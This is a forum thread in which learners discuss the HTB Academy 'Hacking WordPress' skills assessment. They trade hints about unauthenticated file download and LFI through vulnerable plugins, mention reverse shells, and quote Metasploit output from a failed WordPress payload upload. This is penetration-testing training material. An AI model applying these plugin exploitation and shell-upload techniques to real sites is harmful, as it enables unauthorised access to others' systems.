HTB Academy - Hacking wordpress, Skills Assessment

Hi,

I’ve got a problem with one task in Hacking Wordpress - Skills Assessment.

I got everything but “Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.”.

Do you have any tips which file includes a flag, because i can’t get it? Reverse shell actually obtained.

Hint LFI:
You can find the solution on the topic “Exploiting a Vulnerable Plugin”. Also you can check manually all plugins on Exploit-DB.

My Shell Problem:
I have some problems with the shell. I have the passwords an login, it works. But i cant upload the shell with metasploit i got the follow message:

[+] Authenticated with WordPress
[] Preparing payload…
[
] Uploading payload…
[] Executing the payload at /wp-content/plugins/pWwazjprXa/obGHIQqZmr.php…
[!] This exploit may require manual cleanup of ‘obGHIQqZmr.php’ on the target
[!] This exploit may require manual cleanup of ‘pWwazjprXa.php’ on the target
[!] This exploit may require manual cleanup of ‘…/pWwazjprXa’ on the target
[
] Exploit completed, but no session was created.

or

[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.

You also use msf? Maybe you have a hint?

solved: i upload the shell manually…

regards

Type your comment> @DufterTyp said:

Hint LFI:
You can find the solution on the topic “Exploiting a Vulnerable Plugin”. Also you can check manually all plugins on Exploit-DB.

I was able to find and use LFI but how do i know which file contains flag?

You should search for “unauthenticated file download” not LFI for this question…
Check all plugins again on exploit DB…

I can’t find the answer to the question:

“Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.”

Things I’ve done:

  • Solved all other questions. Found the 2 other flags.
  • Got a reverse shell.
  • Searched the whole filesystem for other flag files. Nothing.
  • Grep searched the whole filesystem for files containing ‘HTB’. Nothing.
  • Manually went through /plugins/ folder hoping to find that file that contains the flag. Nothing.

Can anyone point to the right direction? What does the question need? ?
Thanks!

The report you generate has vulnerabilities. Check them all. Shouldn’t take long.